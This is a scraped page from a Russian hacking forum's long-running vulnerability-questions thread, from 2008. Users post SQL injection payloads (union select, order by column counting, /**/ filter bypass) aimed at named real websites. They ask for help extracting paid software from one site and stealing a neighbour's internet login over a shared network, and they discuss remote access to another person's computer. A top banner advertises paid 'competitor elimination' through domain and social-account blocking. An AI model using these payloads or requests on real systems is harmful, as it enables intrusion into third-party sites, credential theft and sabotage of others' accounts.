УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 337 из 2438

337

Опции темы

Поиск в этой теме

Опции просмотра

#3361

25.09.2008, 15:02

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Цитата:

Сообщение от USAkid

у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...

Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.

#3362

25.09.2008, 15:36

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от DJ ][akep

Помогите SQL-inj
Вот кол-во столбцов вроде подобрал

PHP код:


		
			
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*

но так нехочет:

PHP код:


		
			
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов

Цитата:

Сообщение от SIdoy

Цитата:

Сообщение от IND1G0
http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*

Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.

Цитата:

Сообщение от luz3r

Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.

Надо чтобы значение не существовало

__________________

Последний раз редактировалось +toxa+; 25.09.2008 в 16:24..

#3363

25.09.2008, 16:33

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Цитата:

Надо чтобы значение не существовало

я ето имел в виду.

#3364

25.09.2008, 19:59

Gema

Новичок

Регистрация: 18.09.2008

Сообщений: 15

Провел на форуме:
400579

Репутация: 73

Отправить сообщение для Gema с помощью ICQ

помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются

#3365

25.09.2008, 20:19

777DEMYAN777

Познающий

Регистрация: 31.05.2008

Сообщений: 58

Провел на форуме:
584504

Репутация: 27

Отправить сообщение для 777DEMYAN777 с помощью ICQ

Как узнать пасс на инет у соседа? у нас с ним сетка!!!

#3366

25.09.2008, 22:37

~~F1shka~~

Banned

Регистрация: 10.04.2008

Сообщений: 618

Провел на форуме:
2603997

Репутация: 942

Отправить сообщение для F1shka с помощью ICQ

Отправить сообщение для F1shka с помощью AIM

Отправить сообщение для F1shka с помощью Yahoo

Цитата:

Сообщение от 777demyan777

Как узнать пасс на инет у соседа? у нас с ним сетка!!!

По конкретней сударь!

#3367

25.09.2008, 23:34

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от +toxa+

Бред. Значение из переменной подставляется в limit,

1значение переменной вообще может не фигурировать в запросе, что общего между:

Цитата:

страница id=0 union select 1/*

Цитата:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

2 и это не обязательно лимит, например where lala=1,-20,10

:add sql inj здесь не прокатит

#3368

26.09.2008, 00:16

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Так,активировал телнет серв на компе.При коннекти по 3389-ому порту выдаёт следующее:

Вход в систему невозможен из-за ограничений учётной записи

Каких ограничений ? =_=.Проверку делал,когда чел был в логоффе и в онлайне.Фаир и антивирь отключен,ибо это точно не из-за них.

#3369

26.09.2008, 00:32

777DEMYAN777

Познающий

Регистрация: 31.05.2008

Сообщений: 58

Провел на форуме:
584504

Репутация: 27

У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет

#3370

26.09.2008, 02:31

IND1G0

Новичок

Регистрация: 21.09.2008

Сообщений: 9

Провел на форуме:
69313

Репутация: 1

Цитата:

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

Всеи спасибо, разобрался...

Страница 337 из 2438

337

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход